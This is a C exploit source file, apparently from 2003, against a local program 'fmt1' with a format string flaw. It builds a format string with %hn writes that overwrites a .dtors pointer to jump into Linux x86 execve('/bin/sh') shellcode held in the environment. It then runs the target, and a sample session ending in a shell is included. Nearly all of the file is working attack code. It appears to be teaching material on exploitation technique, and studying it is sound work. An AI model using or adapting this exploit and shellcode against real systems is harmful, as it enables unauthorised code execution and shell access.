/*
 * $Id: fmt1-ex5.c,v 1.1.1.1 2004/05/29 14:15:04 raptor Exp $
 *
 * fmt1-ex5.c - fmt1.c exploit (format string exploitation)
 * Copyright (c) 2003 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit uses the direct parameter access feature of newer libc. This
 * way, we can bypass stackpopping and avoid using dummies. Tested on Linux 
 * 2.4.x with gcc-3.2/3.3.1 (offset = 2) and gcc-2.95.4 (offset = 4).
 *
 * Malicious buffer structure:
 * [address part w/o dummies] [special write string]
 * 
 * Usage: ./fmt1-ex5 <offset to first address> (default = 4)
 *
 * $ uname -a
 * Linux karma 2.4.21 #1 SMP Mon Jun 16 00:58:22 CEST 2003 i686 unknown
 * $ gcc --version
 * 2.95.4
 * $ ./fmt1-ex5  
 * Using .dtors address    : 0x80495b0
 * Using ret address       : 0xbfffffdc
 * Using format string     : %.65492u%4$hn%.49187u%5$hn
 * [...]
 * sh-2.05a$ 
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define	VULN		"./fmt1"	// this is the vulnerable program
#define BUF		1024		// max size of the malicious buffer
#define	DTORS		0x080495ac + 4	// address of first pointer in .dtors
#define	OFFSET		4		// offset to first address on stack

/* split an address in 2 words */
#define SPLITW( w1, w2, addr ) {	\
	w1 = (addr & 0x0000ffff);	\
	w2 = (addr & 0xffff0000) >> 16;	\
}

char sc[] = /* linux/x86 shellcode (24 bytes) */
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
	char 	buf[BUF];
	char 	*envp[2] = {sc, NULL};

	int 	n1, n2, offset = OFFSET;
	int 	ret1, ret2;

	char 	*p = buf;
	int 	ret = 0xbffffffa - strlen(sc) - strlen(VULN);

	/* check command line for offset */
	if (argc > 1)
		offset = atoi(argv[1]);

	/* split the ret address in 2 words */
	SPLITW(ret1, ret2, ret);

	/* initialize the malicious buffer */
	bzero(buf, BUF);

	/* address part of the format string */
	*((void **)p) = (void *)(DTORS);
	p += 4;
	*((void **)p) = (void *)(DTORS + 2);
	p += 4;

	/* calculate numeric arguments for the write string */
	n1 = (ret1 - strlen(buf))		% 0x10000;
	n2 = (ret2 - strlen(buf) - n1) 		% 0x10000;

	/* check for potentially dangerous numeric arguments below 10 */
	n1 += (n1 < 10) ? (0x10000) : (0);
	n2 += (n2 < 10) ? (0x10000) : (0);

	/* build the write string part of the format string */
	sprintf(p, "%%.%du%%%d$hn%%.%du%%%d$hn", n1, offset, n2, offset + 1);

	/* print some output */
	fprintf(stderr, "Using .dtors address\t: %p\n", DTORS);
	fprintf(stderr, "Using ret address\t: %p\n", ret);
	fprintf(stderr, "Using format string\t: %s\n\n", buf);

	/* run the vulnerable program */
	execle(VULN, VULN + 2, buf, NULL, envp);
	perror("execle");
}
